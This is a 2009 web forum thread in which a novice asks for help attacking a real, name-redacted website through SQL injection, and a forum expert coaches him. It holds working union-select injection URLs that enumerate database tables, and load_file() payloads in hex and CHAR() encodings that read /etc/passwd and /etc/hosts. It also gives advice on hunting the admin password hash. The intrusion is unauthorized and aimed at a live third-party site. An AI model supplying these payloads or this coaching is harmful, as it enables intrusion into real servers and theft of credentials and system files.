Waraxe IT Security Portal
Login or Register
November 21, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 48
Members: 0
Total: 48
Full disclosure
APPLE-SA-11-19-2024-5 macOS Sequoia 15.1.1
Local Privilege Escalations in needrestart
APPLE-SA-11-19-2024-4 iOS 17.7.2 and iPadOS 17.7.2
APPLE-SA-11-19-2024-3 iOS 18.1.1 and iPadOS 18.1.1
APPLE-SA-11-19-2024-2 visionOS 2.1.1
APPLE-SA-11-19-2024-1 Safari 18.1.1
Reflected XSS - fronsetiav1.1
XXE OOB - fronsetiav1.1
St. Poelten UAS | Path Traversal in Korenix JetPort 5601
St. Poelten UAS | Multiple Stored Cross-Site Scripting in SEH utnserver Pro
Apple web content filter bypass allows unrestricted access to blocked content (macOS/iOS/iPadOS/visionO S/watchOS)
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Sql injection -> i Can not grant access ...
Post new topicReply to topic View previous topic :: View next topic
i Can not grant access ...
PostPosted: Tue Oct 06, 2009 6:23 pm Reply with quote
bizzare
Regular user
Regular user
Joined: Oct 06, 2009
Posts: 5




hey guys , im bob and im new to Sql injection attack and my question is that : i have a vulnerability in this site :
Code:
www.***.com/article.php?id=-77+union+select+0,group_concat(table_name),2,3,4,5,6,7,8,9+from+information_schema.tables--

the result is contain all of default tables of mysql 5.0.81-community and 2 table that named [ press , articles ]
result =
Code:
CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,articles,press

i cant grant access to mysql.user i want the table that contain the users informations.
log in page :
Code:
www.***.com/admin

plz help me ... Wink
View user's profile Send private message
PostPosted: Wed Oct 07, 2009 5:19 am Reply with quote
pexli
Valuable expert
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




Only root have access to mysql.user table.
View user's profile Send private message
?
PostPosted: Wed Oct 07, 2009 6:35 am Reply with quote
bizzare
Regular user
Regular user
Joined: Oct 06, 2009
Posts: 5




its mean that this web page is not vulnerable to hack ? Embarassed
View user's profile Send private message
PostPosted: Wed Oct 07, 2009 7:17 am Reply with quote
pexli
Valuable expert
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




This mean you search admin hash/password in wrong place.
View user's profile Send private message
load_file
PostPosted: Wed Oct 07, 2009 5:05 pm Reply with quote
bizzare
Regular user
Regular user
Joined: Oct 06, 2009
Posts: 5




pexli , you know , im trying to use load_file() function , it seems that i have read access to this host.just i want to know how i can retrieve host name , or host version , i.e. windows server 2003 or linux.
if you want more information about this target , contain address and anyother things , please tell me.
tnx. Cool
View user's profile Send private message
Re: load_file
PostPosted: Wed Oct 07, 2009 6:26 pm Reply with quote
pexli
Valuable expert
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




bizzare wrote:
pexli , you know , im trying to use load_file() function , it seems that i have read access to this host.just i want to know how i can retrieve host name , or host version , i.e. windows server 2003 or linux.
if you want more information about this target , contain address and anyother things , please tell me.
tnx. Cool


Well.Try to read /etc/hosts or /etc/passwd.If you see results probably you are on linux server.
View user's profile Send private message
load_file()
PostPosted: Wed Oct 07, 2009 8:04 pm Reply with quote
bizzare
Regular user
Regular user
Joined: Oct 06, 2009
Posts: 5




right , pexli i use this string and i have not any result check it please :
Code:
http://www.***.com/article.php?id=-88+union+select+1,load_file%280x2F6574632F706173737764%29,3,4,5,6,7,8,9,10--

Code:
0x2F6574632F706173737764 = /etc/passwd

also i try this :
Code:
/etc/hosts

i think that im use load_file() function incorrectly.is it ?
View user's profile Send private message
server information :
PostPosted: Wed Oct 07, 2009 8:29 pm Reply with quote
bizzare
Regular user
Regular user
Joined: Oct 06, 2009
Posts: 5




Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a DAV/2 mod_bwlimited/1.4 PHP/5.2.10 mod_wsgi/2.5 Python/2.5.2 Server at www.***.com Port 80
View user's profile Send private message
PostPosted: Thu Oct 08, 2009 8:08 am Reply with quote
pexli
Valuable expert
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




load_file(CONCAT(CHAR(39),CHAR(47),CHAR(101),CHAR(116),CHAR(99),CHAR(47),CHAR(104),CHAR(111),CHAR(115),CHAR(116),CHAR(115),CHAR(39)))

load_file(0x272f6574632f686f73747327)

load_file%280x272f6574632f686f73747327%29
View user's profile Send private message
i Can not grant access ...
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.045 Seconds